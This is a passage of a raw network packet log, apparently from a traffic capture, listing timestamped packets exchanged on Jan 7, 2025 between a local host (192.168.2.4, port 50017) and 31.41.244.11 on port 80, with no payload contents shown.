Jan 7, 2025 10:09:04.492012978 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.492041111 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.492053032 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.492062092 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.492101908 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.493251085 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.493261099 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.493278980 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.493316889 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.493321896 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.493321896 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.493329048 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.493360996 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.493370056 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.493381977 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.493396044 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.493422031 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.493429899 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.493429899 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.493432999 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.493479967 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.493479967 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.493875980 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.493900061 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.493932962 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.493932962 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.493954897 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.493973017 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.493985891 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.493995905 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.494004965 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.494029045 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.494046926 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.494049072 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.494060040 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.494070053 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.494087934 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.494121075 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.494121075 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.494124889 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.494137049 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.494153023 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.494167089 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.494214058 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.494225025 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.494235992 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.494246006 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.494252920 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.494256973 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.494271040 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.494308949 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.494308949 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.494314909 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.494328022 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.494383097 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.494400024 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.494411945 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.494421005 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.494432926 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.494443893 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.494455099 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.494455099 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.494455099 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.494484901 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.494512081 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.494555950 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.494566917 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.494576931 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.494589090 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.494601011 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.494612932 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.494613886 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.494680882 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.494725943 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.494736910 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.494755983 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.494767904 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.494771957 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.494796991 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.494812965 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.494834900 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.494834900 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.494872093 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.494884968 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.494894981 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.494910002 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.494920969 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.494926929 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.494932890 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.494942904 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.494942904 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.494978905 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.494991064 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.494993925 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.495023966 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.495048046 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.520625114 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.520649910 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.520668983 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.520683050 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.520687103 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.520694017 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.520730019 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.520730019 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.520739079 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.520761967 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.520795107 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.520801067 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.520801067 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.520807028 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.520818949 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.520852089 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.520872116 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.520900011 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.520911932 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.520922899 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.520935059 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.520962000 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.521022081 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.521024942 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.521261930 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.521656036 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.521667004 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.521677971 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.521734953 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.521747112 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.521756887 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.521763086 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.521799088 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.521843910 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.544173956 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.544219971 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.544230938 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.544261932 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.544274092 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.544280052 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.544325113 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.544337034 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.544347048 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.544347048 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.544384956 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.576997042 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.577023029 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.577033043 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.577069044 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.577075958 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.577089071 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.577095985 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.577114105 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.577125072 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.577131987 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.577136040 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.577163935 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.577167034 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.577173948 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.577210903 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.577212095 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.577215910 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.577229023 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.577258110 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.577281952 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.577289104 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.577306986 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.577317953 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.577328920 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.577348948 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.577358961 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.577359915 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.577359915 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.577388048 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.577393055 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.577404022 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.577411890 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.577415943 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.577438116 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.577472925 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.577496052 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.577519894 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.577529907 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.577548027 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.577558041 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.577563047 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.577569962 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.577580929 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.577584028 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.577593088 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.577625990 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.577632904 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.577649117 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.577660084 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.577671051 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.577682018 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.577712059 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.577712059 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.577723026 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.577734947 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.577744961 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.577747107 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.577770948 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.577781916 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.577800035 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.577800035 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.577838898 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.579636097 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.579659939 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.579672098 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.579690933 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.579706907 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.579720020 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.579736948 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.579742908 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.579758883 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.579766989 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.579777002 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.579787970 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.579818010 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.579818010 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.579818010 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.579837084 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.579849005 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.579849958 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.579860926 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.579910040 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.579910040 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.579914093 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.579926014 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.579937935 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.579955101 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.579982996 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.579992056 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.579992056 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.579992056 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.580034971 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.580049038 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.580059052 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.580060005 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.580060005 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.580100060 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.580123901 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.580209970 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.580223083 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.580244064 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.580255985 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.580266953 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.580279112 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.580284119 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.580291033 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.580302000 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.580319881 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.580319881 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.580329895 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.580347061 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.580358028 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.580363035 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.580363035 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.580368996 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.580379963 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.580390930 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.580398083 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.580403090 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.580415964 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.580427885 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.580439091 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.580445051 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.580445051 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.580450058 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.580462933 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.580472946 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.580487967 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.580487967 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.580568075 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.580579996 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.580591917 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.580631018 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.580785036 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.580796957 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.580812931 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.580817938 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.580827951 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.580836058 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.580873966 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.607536077 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.607547045 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.607557058 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.607600927 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.607610941 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.607626915 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.607664108 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.607666016 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.607676983 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.607805967 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.607811928 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.607815981 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.607827902 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.607853889 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.607868910 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.607880116 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.607887030 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.607923985 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.607933998 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.608083010 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.608093977 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.608139992 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.608434916 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.608445883 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.608458996 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.608484983 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.608486891 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.608498096 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.608508110 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.608510017 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.608519077 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.608565092 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.608608007 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.630985022 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.631004095 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.631023884 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.631035089 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.631078959 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.631091118 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.631093979 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.631093979 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.631128073 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.631138086 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.631151915 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.631174088 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.631212950 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.664268970 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.664280891 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.664292097 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.664304972 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.664391994 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.664414883 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.664433956 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.664444923 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.664455891 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.664467096 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.664478064 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.664488077 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.664489031 CET	80	50017	31.41.244.11	192.168.2.4
